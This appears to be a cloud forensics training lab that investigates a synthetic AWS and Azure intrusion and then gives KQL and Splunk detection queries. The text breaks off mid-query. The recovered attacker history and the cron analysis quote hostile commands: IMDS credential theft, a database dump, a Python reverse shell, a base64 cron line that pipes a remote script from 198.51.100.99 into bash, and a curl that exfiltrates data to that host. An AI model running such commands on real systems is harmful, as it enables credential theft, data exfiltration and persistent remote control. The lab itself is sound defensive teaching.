# 3402 2026-03-24 15:57:22.000000 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/qfs-api-role
# 3402 2026-03-24 15:58:00.000000 mkdir -p /tmp/.staging
# 3402 2026-03-24 15:58:15.000000 psql -h db01.quantumfinancial.example.com -U apiuser -d qfs_prod -c "COPY (SELECT * FROM customers LIMIT 50000) TO STDOUT WITH CSV HEADER" > /tmp/.staging/customer_export.csv
# 3402 2026-03-24 15:59:00.000000 gzip /tmp/.staging/customer_export.csv
# 3402 2026-03-24 15:59:30.000000 python3 -c "import socket,subprocess,os;..."
# 3402 2026-03-24 16:00:00.000000 (crontab -l; echo "*/5 * * * * echo 'Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo' | base64 -d | bash") | crontab -
# 3402 2026-03-24 16:01:00.000000 curl -s https://198.51.100.99/exfil --data-binary @/tmp/.staging/customer_export.csv.gz
Critical Findings from Memory Analysis
The attacker (via SSM Session Manager at 15:55 UTC):
- Harvested EC2 instance role credentials from the IMDS metadata service (169.254.169.254)
- Read application secrets from
/opt/qfs-api/.env(environment variables with database credentials) - Exfiltrated customer data -- exported 50,000 records from the PostgreSQL database to CSV
- Established a reverse shell to 203.0.113.42:4443 using Python
- Installed persistence via cron job that polls a C2 server every 5 minutes
- Exfiltrated compressed data to 198.51.100.99 via HTTPS
All IPs, credentials, and data are 100% SYNTHETIC.
Step 2.4: Disk Image Mounting and Analysis¶
# ============================================================
# Step 2.4: Mount EBS Snapshot as Volume for Disk Forensics
# Read-only mounting preserves evidence integrity
# ============================================================
# Create a volume from the forensic snapshot in a forensic AZ
$ aws ec2 create-volume \
--snapshot-id snap-0a1b2c3d4e5f0001 \
--availability-zone us-east-1a \
--volume-type gp3 \
--tag-specifications 'ResourceType=volume,Tags=[
{Key=CaseId,Value=QFS-IR-2026-0042},
{Key=Purpose,Value=forensic-analysis},
{Key=DoNotDelete,Value=true}
]' \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"VolumeId": "vol-forensic-0a1b2c3d",
"Size": 50,
"SnapshotId": "snap-0a1b2c3d4e5f0001",
"AvailabilityZone": "us-east-1a",
"State": "creating"
}
# Attach to forensic workstation instance (read-only in practice)
$ aws ec2 attach-volume \
--volume-id vol-forensic-0a1b2c3d \
--instance-id i-forensic-workstation \
--device /dev/xvdz \
--profile forensics \
--region us-east-1
# On the forensic workstation — mount read-only
# CRITICAL: Always mount forensic evidence read-only
$ sudo mkdir -p /mnt/forensic-evidence/root-vol
$ sudo mount -o ro,noexec,nosuid,nodev /dev/xvdz1 /mnt/forensic-evidence/root-vol
# Verify read-only mount
$ mount | grep forensic
# /dev/xvdz1 on /mnt/forensic-evidence/root-vol type ext4 (ro,noexec,nosuid,nodev)
# ---- Disk Forensic Analysis ----
# Check for recently modified files during the attack window
$ sudo find /mnt/forensic-evidence/root-vol -newermt "2026-03-24 14:00" \
-not -path "*/proc/*" -not -path "*/sys/*" \
-type f -ls 2>/dev/null | sort -k9 | head -30
# SYNTHETIC OUTPUT:
# 131073 4 -rw-r--r-- 1 root root 856 Mar 24 15:57 /mnt/forensic-evidence/root-vol/opt/qfs-api/.env.bak
# 262144 8 -rw-r--r-- 1 ubuntu ubuntu 4096 Mar 24 15:58 /mnt/forensic-evidence/root-vol/tmp/.staging/customer_export.csv.gz
# 393216 4 -rwxr-xr-x 1 root root 2048 Mar 24 16:00 /mnt/forensic-evidence/root-vol/tmp/.staging/.update.sh
# 524288 4 -rw------- 1 ubuntu ubuntu 512 Mar 24 16:00 /mnt/forensic-evidence/root-vol/var/spool/cron/crontabs/ubuntu
# 655360 12 -rw-r--r-- 1 root root 12288 Mar 24 15:55 /mnt/forensic-evidence/root-vol/var/log/auth.log
# 786432 4 -rw-r--r-- 1 root root 1024 Mar 24 16:01 /mnt/forensic-evidence/root-vol/tmp/.staging/.c2_config
# Examine the malicious cron entry
$ sudo cat /mnt/forensic-evidence/root-vol/var/spool/cron/crontabs/ubuntu
# SYNTHETIC OUTPUT:
# # DO NOT EDIT THIS FILE
# # (cron installed on Tue Mar 24 16:00:00 2026)
# */5 * * * * echo "Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo" | base64 -d | bash
# Decode the base64 payload
$ echo "Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo" | base64 -d
# curl -s https://198.51.100.99/c2 | bash
# Examine the hidden C2 configuration file
$ sudo cat /mnt/forensic-evidence/root-vol/tmp/.staging/.c2_config
# SYNTHETIC OUTPUT:
# [c2]
# server = 203.0.113.42
# port = 4443
# protocol = tcp
# beacon_interval = 300
# jitter = 0.2
# exfil_server = 198.51.100.99
# exfil_port = 443
# exfil_protocol = https
# Generate timeline with plaso/log2timeline
$ sudo log2timeline.py \
--storage-file ~/cloud-dfir-lab24/timeline/ec2-root-vol.plaso \
/mnt/forensic-evidence/root-vol
# Convert plaso output to CSV timeline
$ psort.py \
--output-time-zone UTC \
-o l2tcsv \
-w ~/cloud-dfir-lab24/timeline/ec2-root-vol-timeline.csv \
~/cloud-dfir-lab24/timeline/ec2-root-vol.plaso \
"date > '2026-03-24 14:00:00' AND date < '2026-03-25 00:00:00'"
echo "[+] Disk forensics complete — timeline generated"
Step 2.5: VPC Flow Logs Analysis¶
# ============================================================
# Step 2.5: VPC Flow Logs — Network Forensics
# Identify lateral movement and data exfiltration flows
# ============================================================
# Query VPC Flow Logs via CloudWatch Logs Insights
$ aws logs start-query \
--log-group-name "vpc-flow-logs-prod" \
--start-time $(date -d "2026-03-24" +%s) \
--end-time $(date -d "2026-03-25" +%s) \
--query-string '
fields @timestamp, srcAddr, dstAddr, srcPort, dstPort,
protocol, packets, bytes, action
| filter srcAddr = "10.100.1.15" or dstAddr = "10.100.1.15"
| filter dstAddr like /^203\.0\.113\./ or
dstAddr like /^198\.51\.100\./ or
srcAddr like /^203\.0\.113\./ or
srcAddr like /^198\.51\.100\./
| sort @timestamp asc
| limit 200' \
--profile forensics
# SYNTHETIC Flow Log Results — External Connections from Compromised Instance:
# @timestamp srcAddr dstAddr srcPort dstPort proto packets bytes action
# 2026-03-24 15:55:10 203.0.113.42 10.100.1.15 48231 22 TCP 12 2048 ACCEPT
# 2026-03-24 15:59:30 10.100.1.15 203.0.113.42 45678 4443 TCP 156 32768 ACCEPT
# 2026-03-24 16:00:00 203.0.113.42 10.100.1.15 4443 45678 TCP 48 8192 ACCEPT
# 2026-03-24 16:01:00 10.100.1.15 198.51.100.99 45679 443 TCP 2847 45678912 ACCEPT
# 2026-03-24 16:01:30 198.51.100.99 10.100.1.15 443 45679 TCP 312 16384 ACCEPT
# 2026-03-24 16:05:00 10.100.1.15 198.51.100.99 45680 443 TCP 1523 23456789 ACCEPT
# 2026-03-24 16:15:00 10.100.1.15 198.51.100.99 45681 443 TCP 3012 89012345 ACCEPT
# Data volume analysis — how much data was exfiltrated?
# SYNTHETIC calculation:
# Flow 1 (16:01): 45,678,912 bytes = ~43.6 MB
# Flow 2 (16:05): 23,456,789 bytes = ~22.4 MB
# Flow 3 (16:15): 89,012,345 bytes = ~84.9 MB
# Total outbound to 198.51.100.99: ~150.9 MB
# Query for internal lateral movement from compromised host
$ aws logs start-query \
--log-group-name "vpc-flow-logs-prod" \
--start-time $(date -d "2026-03-24" +%s) \
--end-time $(date -d "2026-03-25" +%s) \
--query-string '
fields @timestamp, srcAddr, dstAddr, srcPort, dstPort,
protocol, packets, bytes, action
| filter srcAddr = "10.100.1.15"
| filter dstAddr like /^10\.100\./
| filter dstPort in [22, 5432, 3306, 445, 3389, 5985, 5986]
| sort @timestamp asc
| limit 100' \
--profile forensics
# SYNTHETIC OUTPUT — Lateral Movement Detected:
# @timestamp srcAddr dstAddr srcPort dstPort proto action
# 2026-03-24 15:58:00 10.100.1.15 10.100.3.10 52341 5432 TCP ACCEPT
# 2026-03-24 16:10:00 10.100.1.15 10.100.2.20 52342 22 TCP ACCEPT
# 2026-03-24 16:20:00 10.100.1.15 10.100.2.30 52343 22 TCP ACCEPT
# FINDING: Compromised host connected to:
# - 10.100.3.10:5432 (PostgreSQL database — data exfiltration source)
# - 10.100.2.20:22 and 10.100.2.30:22 (SSH lateral movement to app tier)
Step 2.6: S3 Access Log Analysis¶
# ============================================================
# Step 2.6: S3 Access Logs — Data Exfiltration Detection
# Analyze access patterns on the data lake bucket
# ============================================================
# Download S3 access logs for the data lake bucket
$ aws s3 sync \
s3://qfs-s3-access-logs-123456789012/qfs-datalake-prod-123456789012/ \
~/cloud-dfir-lab24/evidence/aws/s3-access/ \
--profile forensics \
--exclude "*" \
--include "2026-03-24*"
# Parse S3 access logs for the compromised user
$ cat ~/cloud-dfir-lab24/evidence/aws/s3-access/2026-03-24* | \
grep "dev-jenkins-ci" | \
awk '{print $3, $4, $5, $8, $9, $10, $11, $12, $13}' | \
head -20
# SYNTHETIC OUTPUT:
# [24/Mar/2026:15:05:00 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT customers/export/2026/customers_full.csv.gz 200 - 45678912
# [24/Mar/2026:15:05:15 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT customers/export/2026/customers_pii.csv.gz 200 - 23456789
# [24/Mar/2026:15:05:30 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT transactions/2026/Q1/transactions_summary.parquet 200 - 89012345
# [24/Mar/2026:15:10:22 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT compliance/reports/sox_audit_2026.xlsx 200 - 5234567
# [24/Mar/2026:15:12:00 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT customers/export/2026/accounts_balances.csv.gz 200 - 67890123
# Summarize exfiltrated data
$ python3 << 'PYEOF'
# SYNTHETIC — S3 access log analysis summary
exfiltrated_files = [
{"file": "customers/export/2026/customers_full.csv.gz", "size_bytes": 45678912, "type": "PII"},
{"file": "customers/export/2026/customers_pii.csv.gz", "size_bytes": 23456789, "type": "PII"},
{"file": "transactions/2026/Q1/transactions_summary.parquet", "size_bytes": 89012345, "type": "Financial"},
{"file": "compliance/reports/sox_audit_2026.xlsx", "size_bytes": 5234567, "type": "Compliance"},
{"file": "customers/export/2026/accounts_balances.csv.gz", "size_bytes": 67890123, "type": "Financial"},
]
total_bytes = sum(f["size_bytes"] for f in exfiltrated_files)
print("=" * 70)
print("S3 DATA EXFILTRATION SUMMARY")
print("Case: QFS-IR-2026-0042 | ALL DATA IS SYNTHETIC")
print("=" * 70)
print(f"\n{'File':<55} {'Size':>10} {'Type':<12}")
print("-" * 77)
for f in exfiltrated_files:
size_mb = f["size_bytes"] / (1024 * 1024)
print(f"{f['file']:<55} {size_mb:>7.1f} MB {f['type']:<12}")
print("-" * 77)
print(f"{'TOTAL':<55} {total_bytes / (1024*1024):>7.1f} MB")
print(f"\nFiles accessed: {len(exfiltrated_files)}")
print(f"Data categories: PII, Financial, Compliance")
print(f"Regulatory impact: GDPR, SOX, PCI DSS notification required")
PYEOF
Exercise 2 Detection Queries¶
// -----------------------------------------------------------------
// Detection: EC2 Instance Metadata Service (IMDS) Credential Theft
// MITRE: T1552.005 — Unsecured Credentials: Cloud Instance Metadata
// -----------------------------------------------------------------
// This query detects access to the IMDS endpoint for IAM credentials
// Requires VPC Flow Logs or application-level logging
AWSCloudTrail
| where TimeGenerated > ago(24h)
| where EventSource == "ec2.amazonaws.com"
| where EventName in ("DescribeInstances", "RunInstances")
| where UserIdentityType == "AssumedRole"
| where UserIdentitySessionContext contains "i-0a1b2c3d4e5f6789a"
| where SourceIpAddress !in ("10.100.2.50", "10.50.1.10")
| project TimeGenerated, EventName, UserIdentityArn, SourceIpAddress,
UserAgent, RequestParameters
// -----------------------------------------------------------------
// Detection: Unusual S3 Data Download Volume (Exfiltration)
// MITRE: T1530 — Data from Cloud Storage
// -----------------------------------------------------------------
AWSS3AccessLogs
| where TimeGenerated > ago(24h)
| where Operation == "REST.GET.OBJECT"
| where HTTPStatus == 200
| summarize
TotalBytes = sum(ObjectSize),
FileCount = count(),
UniqueKeys = dcount(Key),
Files = make_set(Key, 20)
by Requester, BucketName, bin(TimeGenerated, 1h)
| where TotalBytes > 50000000 // > 50 MB per hour
| extend TotalMB = round(TotalBytes / 1048576.0, 1)
| project TimeGenerated, Requester, BucketName, TotalMB, FileCount,
UniqueKeys, Files
| order by TotalMB desc
// -----------------------------------------------------------------
// Detection: VPC Flow — Large Outbound Data Transfer
// MITRE: T1048 — Exfiltration Over Alternative Protocol
// -----------------------------------------------------------------
AWSVPCFlow
| where TimeGenerated > ago(24h)
| where FlowDirection == "O"
| where DstAddr !startswith "10." and DstAddr !startswith "172.16."
and DstAddr !startswith "192.168."
| summarize
TotalBytes = sum(Bytes),
TotalPackets = sum(Packets),
ConnectionCount = count(),
DestPorts = make_set(DstPort)
by SrcAddr, DstAddr, bin(TimeGenerated, 15m)
| where TotalBytes > 10000000 // > 10 MB in 15 minutes
| extend TotalMB = round(TotalBytes / 1048576.0, 1)
| project TimeGenerated, SrcAddr, DstAddr, TotalMB, TotalPackets,
ConnectionCount, DestPorts
| order by TotalMB desc
// -----------------------------------------------------------------
// Detection: EC2 Instance Metadata Service (IMDS) Credential Theft
// MITRE: T1552.005 — Unsecured Credentials: Cloud Instance Metadata
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
eventSource="ec2.amazonaws.com"
(eventName="DescribeInstances" OR eventName="RunInstances")
userIdentity.type="AssumedRole"
earliest=-24h
| search userIdentity.sessionContext.sessionIssuer.arn="*i-0a1b2c3d4e5f6789a*"
| search NOT sourceIPAddress IN ("10.100.2.50", "10.50.1.10")
| table _time, eventName, userIdentity.arn, sourceIPAddress,
userAgent, requestParameters
// -----------------------------------------------------------------
// Detection: Unusual S3 Data Download Volume (Exfiltration)
// MITRE: T1530 — Data from Cloud Storage
// -----------------------------------------------------------------
index=aws sourcetype="aws:s3:accesslogs"
operation="REST.GET.OBJECT" http_status=200
earliest=-24h
| stats
sum(object_size) as TotalBytes,
count as FileCount,
dc(key) as UniqueKeys,
values(key) as Files
by requester, bucket, span=1h
| where TotalBytes > 50000000
| eval TotalMB = round(TotalBytes / 1048576, 1)
| table _time, requester, bucket, TotalMB, FileCount, UniqueKeys, Files
| sort -TotalMB
// -----------------------------------------------------------------
// Detection: VPC Flow — Large Outbound Data Transfer
// MITRE: T1048 — Exfiltration Over Alternative Protocol
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudwatchlogs:vpcflow"
action=ACCEPT
earliest=-24h
| where NOT (cidrmatch("10.0.0.0/8", dest_ip) OR
cidrmatch("172.16.0.0/12", dest_ip) OR
cidrmatch("192.168.0.0/16", dest_ip))
| stats
sum(bytes) as TotalBytes,
sum(packets) as TotalPackets,
count as ConnectionCount,
values(dest_port) as DestPorts
by src_ip, dest_ip, span=15m
| where TotalBytes > 10000000
| eval TotalMB = round(TotalBytes / 1048576, 1)
| table _time, src_ip, dest_ip, TotalMB, TotalPackets,
ConnectionCount, DestPorts
| sort -TotalMB
Exercise 3: Azure Activity Log & Sentinel Investigation¶
Exercise Objective
Investigate the Azure component of the multi-cloud intrusion. Export and analyze Azure Activity Logs, Azure AD sign-in and audit logs, hunt for compromise indicators in Microsoft Sentinel, detect Managed Identity and Service Principal abuse, and audit Key Vault access patterns.
MITRE ATT&CK Techniques:
- T1078.004 -- Valid Accounts: Cloud Accounts
- T1098.003 -- Account Manipulation: Additional Cloud Roles
- T1552.001 -- Unsecured Credentials: Credentials in Files
- T1556.006 -- Modify Authentication Process: Multi-Factor Authentication
- T1528 -- Steal Application Access Token
Scenario Context¶
Azure Incident Indicators
At 2026-03-24T14:38 UTC -- six minutes after the AWS GuardDuty alert -- Microsoft Sentinel triggered a medium-severity alert: Unusual Key Vault access by Managed Identity. The Managed Identity mi-compliance-scanner (assigned to VM vm-compliance-01) was observed reading 47 secrets from Key Vault kv-qfs-prod-eastus within a 3-minute window. Historical baseline: this identity reads 2-3 secrets per day for CIS benchmark scanning.
Additionally, at 14:52 UTC, the Service Principal sp-devops-pipeline attempted to add a new credential (client secret) to itself -- a classic persistence technique.
Azure Indicators:
| Indicator | Value | Type |
|---|---|---|
| Managed Identity | mi-compliance-scanner | Anomalous Key Vault access |
| Service Principal | sp-devops-pipeline | Attempted credential addition |
| Key Vault | kv-qfs-prod-eastus | 47 secret reads in 3 minutes |
| Source VM | vm-compliance-01 (10.150.2.10) | Compromised compliance scanner |
| Alert time | 2026-03-24T14:38:00Z | Sentinel alert |
Step 3.1: Azure Activity Log Export and Analysis¶
# ============================================================
# Step 3.1: Export Azure Activity Logs
# Capture management-plane operations for the incident window
# ============================================================
# Export Azure Activity Log for the incident window (72 hours)
$ az monitor activity-log list \
--start-time "2026-03-22T00:00:00Z" \
--end-time "2026-03-25T00:00:00Z" \
--output json \
> ~/cloud-dfir-lab24/evidence/azure/activity-logs/activity-log-full.json
# SYNTHETIC: Downloaded 2,341 activity log entries
# Filter for the compromised Managed Identity
$ cat ~/cloud-dfir-lab24/evidence/azure/activity-logs/activity-log-full.json | \
jq '[.[] | select(.caller == "mi-compliance-scanner" or
.caller == "sp-devops-pipeline")] | length'
# SYNTHETIC: 89
# Extract Key Vault operations by the compromised identity
$ cat ~/cloud-dfir-lab24/evidence/azure/activity-logs/activity-log-full.json | \
jq '[.[] | select(.caller == "mi-compliance-scanner") |
select(.resourceType.value == "Microsoft.KeyVault/vaults") |
{time: .eventTimestamp, operation: .operationName.value,
status: .status.value, resource: .resourceId}]' \
| jq -s 'flatten | sort_by(.time)'
# SYNTHETIC OUTPUT:
[
{
"time": "2026-03-24T14:35:12Z",
"operation": "Microsoft.KeyVault/vaults/secrets/read",
"status": "Succeeded",
"resource": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.KeyVault/vaults/kv-qfs-prod-eastus"
},
{
"time": "2026-03-24T14:35:15Z",
"operation": "Microsoft.KeyVault/vaults/secrets/read",
"status": "Succeeded",
"resource": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.KeyVault/vaults/kv-qfs-prod-eastus"
}
]
# ... (47 total secret reads between 14:35 and 14:38)
# Check for Service Principal credential manipulation
$ cat ~/cloud-dfir-lab24/evidence/azure/activity-logs/activity-log-full.json | \
jq '[.[] | select(.caller == "sp-devops-pipeline") |
{time: .eventTimestamp, operation: .operationName.value,
status: .status.value, resource: .resourceId,
properties: .properties}]'
# SYNTHETIC OUTPUT:
[
{
"time": "2026-03-24T14:52:33Z",
"operation": "Microsoft.Authorization/roleAssignments/write",
"status": "Failed",
"resource": "/subscriptions/12345678-abcd-ef01-2345-678901234567/providers/Microsoft.Authorization/roleAssignments/a1b2c3d4",
"properties": {
"statusCode": "Forbidden",
"message": "The client 'sp-devops-pipeline' with object id 'a1b2c3d4-0000-0000-0000-000000000001' does not have authorization to perform action 'Microsoft.Authorization/roleAssignments/write'"
}
},
{
"time": "2026-03-24T14:53:01Z",
"operation": "Microsoft.Graph/applications/credentials/update",
"status": "Succeeded",
"resource": "applications/a1b2c3d4-0000-0000-0000-000000000002",
"properties": {
"message": "Added new client secret to application"
}
}
]
# CRITICAL FINDING: sp-devops-pipeline successfully added a new client
# secret to its own application registration at 14:53 UTC
# This is a persistence technique — the attacker now has a backdoor credential
Step 3.2: Azure AD Sign-In and Audit Log Forensics¶
# ============================================================
# Step 3.2: Azure AD Sign-In Logs & Audit Logs
# Detect authentication anomalies and privilege changes
# ============================================================
# Export Azure AD Sign-In Logs via Microsoft Graph API
$ az rest --method GET \
--url "https://graph.microsoft.com/v1.0/auditLogs/signIns?\$filter=createdDateTime ge 2026-03-22T00:00:00Z and createdDateTime le 2026-03-25T00:00:00Z&\$top=500" \
--output json \
> ~/cloud-dfir-lab24/evidence/azure/signin-logs/signin-logs.json
# Filter for suspicious sign-ins
$ cat ~/cloud-dfir-lab24/evidence/azure/signin-logs/signin-logs.json | \
jq '.value[] | select(.riskState == "confirmedCompromised" or
.riskLevelDuringSignIn == "high" or
.status.errorCode != 0) |
{time: .createdDateTime, user: .userDisplayName,
app: .appDisplayName, ip: .ipAddress,
location: .location.city, risk: .riskLevelDuringSignIn,
status: .status.errorCode, failure: .status.failureReason}'
# SYNTHETIC OUTPUT — Suspicious Sign-Ins:
{
"time": "2026-03-24T14:25:00Z",
"user": "DevOps Service Account",
"app": "Azure Portal",
"ip": "203.0.113.42",
"location": "Unknown",
"risk": "high",
"status": 0,
"failure": null
}
{
"time": "2026-03-24T14:26:30Z",
"user": "DevOps Service Account",
"app": "Microsoft Graph",
"ip": "203.0.113.42",
"location": "Unknown",
"risk": "high",
"status": 0,
"failure": null
}
{
"time": "2026-03-24T14:50:00Z",
"user": "DevOps Service Account",
"app": "Azure Key Vault",
"ip": "203.0.113.42",
"location": "Unknown",
"risk": "high",
"status": 0,
"failure": null
}
# Export Azure AD Audit Logs
$ az rest --method GET \
--url "https://graph.microsoft.com/v1.0/auditLogs/directoryAudits?\$filter=activityDateTime ge 2026-03-22T00:00:00Z and activityDateTime le 2026-03-25T00:00:00Z&\$top=500" \
--output json \
> ~/cloud-dfir-lab24/evidence/azure/audit-logs/directory-audits.json
# Filter for credential and permission changes
$ cat ~/cloud-dfir-lab24/evidence/azure/audit-logs/directory-audits.json | \
jq '.value[] | select(
.activityDisplayName == "Add service principal credentials" or
.activityDisplayName == "Add member to role" or
.activityDisplayName == "Add app role assignment to service principal" or
.activityDisplayName == "Add delegated permission grant" or
.activityDisplayName == "Consent to application" or
.activityDisplayName == "Update application") |
{time: .activityDateTime, activity: .activityDisplayName,
initiatedBy: .initiatedBy, target: .targetResources[0].displayName,
result: .result}'
# SYNTHETIC OUTPUT:
{
"time": "2026-03-24T14:53:01Z",
"activity": "Add service principal credentials",
"initiatedBy": {"app": {"displayName": "sp-devops-pipeline", "appId": "a1b2c3d4-0000-0000-0000-000000000002"}},
"target": "sp-devops-pipeline",
"result": "success"
}
{
"time": "2026-03-24T15:15:00Z",
"activity": "Add member to role",
"initiatedBy": {"app": {"displayName": "sp-devops-pipeline", "appId": "a1b2c3d4-0000-0000-0000-000000000002"}},
"target": "Key Vault Secrets Officer",
"result": "failure"
}
# FINDING: Attacker added credentials to sp-devops-pipeline (persistence)
# and attempted but failed to escalate to Key Vault Secrets Officer role
Step 3.3: Microsoft Sentinel Hunting Queries¶
// -----------------------------------------------------------------
// Hunt: Anomalous Key Vault Secret Access by Managed Identity
// Case: QFS-IR-2026-0042 | MITRE: T1552.001
// -----------------------------------------------------------------
let HistoricalBaseline = AzureDiagnostics
| where TimeGenerated between (ago(30d) .. ago(1d))
| where ResourceType == "VAULTS"
| where OperationName == "SecretGet"
| where identity_claim_oid_g == "a1b2c3d4-0000-0000-0000-mi-compliance"
| summarize DailyAvg = count() / 30.0;
//
AzureDiagnostics
| where TimeGenerated > ago(24h)
| where ResourceType == "VAULTS"
| where OperationName == "SecretGet"
| where identity_claim_oid_g == "a1b2c3d4-0000-0000-0000-mi-compliance"
| summarize
SecretReads = count(),
UniqueSecrets = dcount(id_s),
SecretNames = make_set(requestUri_s, 50),
FirstAccess = min(TimeGenerated),
LastAccess = max(TimeGenerated)
by Resource, CallerIPAddress, bin(TimeGenerated, 5m)
| extend DurationMinutes = datetime_diff('minute', LastAccess, FirstAccess)
| where SecretReads > 10
| project TimeGenerated, Resource, CallerIPAddress, SecretReads,
UniqueSecrets, DurationMinutes, SecretNames
// -----------------------------------------------------------------
// Hunt: Service Principal Credential Addition (Persistence)
// MITRE: T1098.001 — Account Manipulation: Additional Cloud Credentials
// -----------------------------------------------------------------
AuditLogs
| where TimeGenerated > ago(7d)
| where OperationName == "Add service principal credentials"
| where Result == "success"
| extend InitiatedByApp = tostring(InitiatedBy.app.displayName)
| extend InitiatedByAppId = tostring(InitiatedBy.app.appId)
| extend TargetApp = tostring(TargetResources[0].displayName)
| extend TargetAppId = tostring(TargetResources[0].id)
| where InitiatedByAppId == TargetAppId // Self-modification = suspicious
| project TimeGenerated, InitiatedByApp, InitiatedByAppId,
TargetApp, TargetAppId, Result,
ModifiedProperties = TargetResources[0].modifiedProperties
// -----------------------------------------------------------------
// Hunt: Managed Identity Pivoting Between Resources
// MITRE: T1550.001 — Use Alternate Authentication Material
// -----------------------------------------------------------------
AzureActivity
| where TimeGenerated > ago(24h)
| where Caller contains "mi-compliance-scanner"
| summarize
ResourceTypes = make_set(ResourceProviderValue),
Operations = make_set(OperationNameValue),
OperationCount = count(),
UniqueResources = dcount(_ResourceId),
FirstOp = min(TimeGenerated),
LastOp = max(TimeGenerated)
by Caller, CallerIpAddress, bin(TimeGenerated, 1h)
| where OperationCount > 20
| project TimeGenerated, Caller, CallerIpAddress, OperationCount,
UniqueResources, ResourceTypes, Operations
// -----------------------------------------------------------------
// Hunt: Azure Key Vault — Secrets Accessed by Unauthorized Identity
// MITRE: T1552.001 — Unsecured Credentials: Credentials in Files
// -----------------------------------------------------------------
let AuthorizedIdentities = dynamic([
"a1b2c3d4-0000-0000-0000-000000000099" // Known automation (SYNTHETIC)
]);
AzureDiagnostics
| where TimeGenerated > ago(7d)
| where ResourceType == "VAULTS"
| where Resource == "KV-QFS-PROD-EASTUS"
| where OperationName in ("SecretGet", "SecretList")
| where ResultType == "Success"
| where identity_claim_oid_g !in (AuthorizedIdentities)
| summarize
AccessCount = count(),
UniqueSecrets = dcount(requestUri_s),
SecretList = make_set(requestUri_s, 50),
FirstAccess = min(TimeGenerated),
LastAccess = max(TimeGenerated)
by identity_claim_oid_g, CallerIPAddress, Resource
| where AccessCount > 5
| project identity_claim_oid_g, CallerIPAddress, Resource,
AccessCount, UniqueSecrets, FirstAccess, LastAccess, SecretList
| order by AccessCount desc
// -----------------------------------------------------------------
// Hunt: Anomalous Key Vault Secret Access by Managed Identity
// Case: QFS-IR-2026-0042 | MITRE: T1552.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:aad:audit" OR sourcetype="azure:monitor"
ResourceType="VAULTS" OperationName="SecretGet"
"identity_claim_oid_g"="a1b2c3d4-0000-0000-0000-mi-compliance"
earliest=-24h
| stats
count as SecretReads,
dc(id_s) as UniqueSecrets,
values(requestUri_s) as SecretNames,
min(_time) as FirstAccess,
max(_time) as LastAccess
by Resource, CallerIPAddress, span=5m
| eval DurationMinutes = round((LastAccess - FirstAccess) / 60, 1)
| where SecretReads > 10
| convert ctime(FirstAccess) ctime(LastAccess)
| table _time, Resource, CallerIPAddress, SecretReads,
UniqueSecrets, DurationMinutes, SecretNames
// -----------------------------------------------------------------
// Hunt: Service Principal Credential Addition (Persistence)
// MITRE: T1098.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:aad:audit"
operationName="Add service principal credentials"
result="success"
earliest=-7d
| eval InitiatedByApp=spath(_raw, "initiatedBy.app.displayName")
| eval InitiatedByAppId=spath(_raw, "initiatedBy.app.appId")
| eval TargetApp=spath(_raw, "targetResources{0}.displayName")
| eval TargetAppId=spath(_raw, "targetResources{0}.id")
| where InitiatedByAppId == TargetAppId
| table _time, InitiatedByApp, InitiatedByAppId, TargetApp, result
// -----------------------------------------------------------------
// Hunt: Managed Identity Pivoting Between Resources
// MITRE: T1550.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor:activity"
Caller="*mi-compliance-scanner*"
earliest=-24h
| stats
values(ResourceProviderValue) as ResourceTypes,
values(OperationNameValue) as Operations,
count as OperationCount,
dc(ResourceId) as UniqueResources,
min(_time) as FirstOp,
max(_time) as LastOp
by Caller, CallerIpAddress, span=1h
| where OperationCount > 20
| convert ctime(FirstOp) ctime(LastOp)
| table _time, Caller, CallerIpAddress, OperationCount,
UniqueResources, ResourceTypes, Operations
// -----------------------------------------------------------------
// Hunt: Key Vault — Secrets Accessed by Unauthorized Identity
// MITRE: T1552.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor"
ResourceType="VAULTS" Resource="KV-QFS-PROD-EASTUS"
(OperationName="SecretGet" OR OperationName="SecretList")
ResultType="Success"
earliest=-7d
| search NOT identity_claim_oid_g IN ("a1b2c3d4-0000-0000-0000-000000000099")
| stats
count as AccessCount,
dc(requestUri_s) as UniqueSecrets,
values(requestUri_s) as SecretList,
min(_time) as FirstAccess,
max(_time) as LastAccess
by identity_claim_oid_g, CallerIPAddress, Resource
| where AccessCount > 5
| sort -AccessCount
| convert ctime(FirstAccess) ctime(LastAccess)
| table identity_claim_oid_g, CallerIPAddress, Resource,
AccessCount, UniqueSecrets, FirstAccess, LastAccess, SecretList
Step 3.4: Key Vault Diagnostic Log Deep Dive¶
# ============================================================
# Step 3.4: Key Vault Access Audit
# Enumerate exactly which secrets the attacker read
# ============================================================
# Export Key Vault diagnostic logs
$ az monitor diagnostic-settings list \
--resource /subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.KeyVault/vaults/kv-qfs-prod-eastus \
--output json
# SYNTHETIC OUTPUT — diagnostic settings:
{
"value": [
{
"name": "kv-diag-to-sentinel",
"logs": [
{"category": "AuditEvent", "enabled": true, "retentionPolicy": {"days": 90, "enabled": true}}
],
"workspaceId": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-security/providers/Microsoft.OperationalInsights/workspaces/law-qfs-sentinel"
}
]
}
# Query Key Vault audit events from Log Analytics
# In Sentinel, run this KQL query:
// Key Vault Secret Read Audit — Full Enumeration
// Case: QFS-IR-2026-0042
AzureDiagnostics
| where TimeGenerated between (
datetime("2026-03-24T14:30:00Z") .. datetime("2026-03-24T15:00:00Z"))
| where ResourceType == "VAULTS"
